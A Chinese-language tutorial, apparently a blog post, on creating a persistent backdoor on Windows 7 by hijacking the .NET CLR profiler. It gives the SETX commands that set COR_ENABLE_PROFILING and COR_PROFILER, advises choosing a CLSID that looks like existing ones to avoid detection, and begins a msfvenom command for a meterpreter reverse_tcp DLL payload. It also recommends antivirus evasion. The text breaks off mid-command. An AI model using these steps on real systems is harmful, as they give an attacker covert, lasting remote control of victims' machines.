利用CLR劫持dll建立持续性后门
CLR全称Common Language Runtime(公共语言运行库),是一个可由多种编程语言使用的运行环境。
1、 测试环境
攻击机:192.168.11.131
靶机:192.168.11.132(Win7)
2、 持续性后门建立
2、1 配置环境变量
CLR需配置环境变量中用户变量才能完全劫持.Net,增加 COR_ENABLE_PROFILING 值为 1,COR_PROFILER 值为 CLSID,CLSID可以为任意值,但不能与原有CLSID冲突,可参照计算机原有CLSID修改,使之更不易被察觉
修改用户环境变量命令如下:
SETX COR_ENABLE_PROFILING 1
SETX COR_PROFILER {AABBCCDD-1234-1234-1234-AABBCCDDEEFF} #{AABBCCDD-1234-1234-1234-AABBCCDDEEFF} 为 CLSID
添加成功后如图所示:
2、2 生成 dll payload
使用msfvenom生成 dll payload,建议做免杀处理
msfvenom -p windows/meterpreter/reverse_tcp